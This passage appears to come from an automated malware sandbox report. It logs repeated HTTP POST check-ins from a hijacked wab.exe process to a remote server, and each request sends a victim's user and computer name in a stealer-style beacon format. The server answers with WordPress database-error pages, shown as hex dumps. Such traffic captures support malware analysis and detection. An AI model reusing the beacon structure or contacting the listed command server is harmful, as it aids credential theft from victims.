                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:15.821460009 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:15.821471930 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.54973724.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:16.137495041 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:16.300112009 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:17.097946882 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:16 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:17.097970963 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:17.098052979 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.54973824.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:17.411804914 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:17.575520992 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:18.344765902 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:17 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:18.344795942 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:18.349348068 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.54973924.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:18.646857023 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:18.809354067 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:19.595073938 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:18 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
